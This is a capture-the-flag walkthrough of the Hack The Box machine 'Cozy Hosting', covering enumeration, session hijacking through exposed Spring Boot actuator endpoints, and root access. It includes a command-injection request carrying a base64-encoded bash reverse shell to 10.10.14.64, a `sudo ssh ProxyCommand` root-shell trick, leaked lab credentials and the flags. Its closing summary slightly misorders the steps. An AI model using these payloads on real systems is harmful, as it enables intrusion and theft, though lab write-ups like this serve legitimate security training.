Hack the Box - Cozy Hosting Write Up
Machine Information⌗
- Machine Name: Cozy Hosting
- OS: Linux
- IP Address: 10.10.11.230
- Difficulty: Easy
- Points: 20
- Release Date: 03 Sep 2023
Summary⌗
The machine “Cozy Hosting” on Hack The Box is an easy-level Linux-based challenge with an IP address of 10.10.11.230. It was released on September 3, 2023, and is worth 20 points. This write-up documents the steps taken to exploit the machine and gain both user and root access.
Enumeration⌗
Nmap Scan⌗
$ nmap -sC -sV -oN nmap_scan.txt 10.10.11.230
# Nmap 7.94 scan initiated Sun Sep 3 02:08:26 2023 as: nmap -sC -sV -v -p- -oN nmap/fullhouse.nmap cozyhosting.htb
Nmap scan report for cozyhosting.htb (10.10.11.230)
Host is up (0.13s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 43:56:bc:a7:f2:ec:46:dd:c1:0f:83:30:4c:2c:aa:a8 (ECDSA)
|_ 256 6f:7a:6c:3f:a6:8d:e2:75:95:d4:7b:71:ac:4f:7e:42 (ED25519)
80/tcp open http nginx 1.18.0 (Ubuntu)
| http-methods:
|_ Supported Methods: GET HEAD OPTIONS
|_http-favicon: Unknown favicon MD5: 72A61F8058A9468D57C3017158769B1F
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-title: Cozy Hosting - Home
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Sep 3 02:17:40 2023 -- 1 IP address (1 host up) scanned in 553.26 seconds
As port 22 and 80 is open and showing nginx webserver service is running, I went straight checking on port 80 only for getting redirected to this domain cozyhosting.htb
So i add this to my /etc/hosts file
echo -n '10.10.11.230 cozyhosting.htb' >> /etc/hosts
Now we ready to go!
Endpoint Enumeration⌗
I use feroxbuster for this purpose, the reason is simple, it won’t miss any status code by default 🤷♂️
feroxbuster -u http://cozyhosting.htb/ -m GET,POST -w /usr/share/seclists/Discovery/Web-Content/raft-small-words.txt --no-sta
te --no-recursion -o ferox.out
Right of the bat, i got two interesting endpoints which are
401 GET 1l 1w 97c http://cozyhosting.htb/admin
500 GET 1l 1w 73c http://cozyhosting.htb/error
/adminredirects me to/login, so i know thatrolefeature exists/errorshows whitelabel error page, which is Spring Boot error signature
Foothold⌗
Phase 1⌗
After a while looking for Spring Boot vulnerability, I finally found that actuators actually has several default endpoints
/dump- displays a dump of threads (including a stack trace)/trace- displays the last several HTTP messages (which could include session identifiers)/logfile- outputs the contents of the log file/shutdown- shuts the application down/mappings- shows all of the MVC controller mappings/env- provides access to the configuration environment/actuatorroot actuator endpoint/restart- restarts the application/heapdump- Builds and returns a heap dump from the JVM used by our application
But regardless only one endpoint is accessible which is /actuator.
This endpoint throws really interesting result
{
"_links": {
"self": {
"href": "http://localhost:8080/actuator",
"templated": false
},
"sessions": {
"href": "http://localhost:8080/actuator/sessions",
"templated": false
},
"beans": {
"href": "http://localhost:8080/actuator/beans",
"templated": false
},
"health": {
"href": "http://localhost:8080/actuator/health",
"templated": false
},
"health-path": {
"href": "http://localhost:8080/actuator/health/{*path}",
"templated": true
},
"env": {
"href": "http://localhost:8080/actuator/env",
"templated": false
},
"env-toMatch": {
"href": "http://localhost:8080/actuator/env/{toMatch}",
"templated": true
},
"mappings": {
"href": "http://localhost:8080/actuator/mappings",
"templated": false
}
}
}
kanderson JSESSIONID on /actuator/sessions
{
"D1444BCCEB4CBEE2EFCB588F405E1F4E": "kanderson"
}
Phase 2⌗
Using kanderson JSESSIONID, I gain access to /admin
After testing I found RCE on /executessh which get invoked when i press Submit on Connection Settings form to be exact code injection happens in username param
Here is raw exploit request
POST /executessh HTTP/1.1
Host: cozyhosting.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/117.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 124
Origin: http://cozyhosting.htb
Connection: close
Referer: http://cozyhosting.htb/admin
Cookie: JSESSIONID=D1444BCCEB4CBEE2EFCB588F405E1F4E
Upgrade-Insecure-Requests: 1
host=10.10.14.64&username=`echo${IFS}YmFzaCAtaSAgPiYgL2Rldi90Y3AvMTAuMTAuMTQuNjQvOTAwMSAgMD4mMSAg${IFS}|base64${IFS}-d|bash`
And yeah as you’ve guessed I got foothold as app user
User⌗
Phase 1⌗
First thing I do was checking who has shell in this box by running this command
cat /etc/passwd | grep sh$
and got this output
Now I know there is user named josh. To escalate to josh, I got file named cloudhosting-0.0.1.jar under /app directory.
So I downloaded this file and reverse engineer it with JD-GUI
Immediately, I found credential to access PostgreSQL within application.properties
server.address=127.0.0.1
server.servlet.session.timeout=5m
management.endpoints.web.exposure.include=health,beans,env,sessions,mappings
management.endpoint.sessions.enabled = true
spring.datasource.driver-class-name=org.postgresql.Driver
spring.jpa.database-platform=org.hibernate.dialect.PostgreSQLDialect
spring.jpa.hibernate.ddl-auto=none
spring.jpa.database=POSTGRESQL
spring.datasource.platform=postgres
spring.datasource.url=jdbc:postgresql://localhost:5432/cozyhosting
spring.datasource.username=postgres
spring.datasource.password=Vg&nvzAQ7XxR
So I went login with psql
Poking around, and I found user credentials in cozyhosting.users
Phase 2⌗
After that I put admin hash to hashcat in order to crack it
hashcat -m 3200 -a 0 admin.hash rockyou.txt --status --status-timer 5
Seconds later I got this beautiful output :)
Not wasting a time, I went straight tried this manchesterunited to login as josh.
And yep it works.
Root⌗
After arriving, first thing I do was type sudo -l, and to my surprise this is the output
So I went on GTFOBins, looking answer for what can i do with this?. GTFOBins says
If the binary is allowed to run as superuser by sudo, it does not drop the elevated privileges and may be used to access the file system, escalate or maintain privileged access. Spawn interactive root shell through ProxyCommand option.
sudo ssh -o ProxyCommand=';sh 0<&2 1>&2' x
and boom!
Rooted.
Flags⌗
user.txt: 0bac7db525b2905468ee0a11dec6d22croot.txt: 8c64581bcae854f66dbc66d408108e6b
Conclusion⌗
The Cozy Hosting machine presented an interesting and educational challenge. Initially, a Nmap scan revealed open ports 22 (SSH) and 80 (HTTP) running an Nginx web server. Further investigation led to a redirection to the domain “cozyhosting.htb,” which was added to the /etc/hosts file for easier access.
Endpoint enumeration using Feroxbuster revealed two interesting endpoints: /admin and /error. The /admin endpoint ultimately led to a remote code execution (RCE) vulnerability in the /executessh functionality, allowing for initial foothold as the app user.
After exploring the system, a Spring Boot vulnerability related to actuator endpoints was identified, leading to the discovery of a JSESSIONID for user kanderson. This enabled access to the /admin page, where RCE was achieved via the username parameter.
Once foothold was established, further enumeration revealed a user named josh. By reverse engineering the “cloudhosting-0.0.1.jar” file and inspecting the PostgreSQL credentials in “application.properties,” it was possible to access the database and retrieve user credentials. Cracking the admin password hash with Hashcat yielded the password “manchesterunited,” allowing access as the josh user.
Finally, the sudo -l command revealed that the sudo ssh command could be exploited to gain root access, and a root shell was successfully obtained.
In conclusion, this machine provided a valuable learning experience in web application vulnerabilities, Linux privilege escalation, and post-exploitation techniques.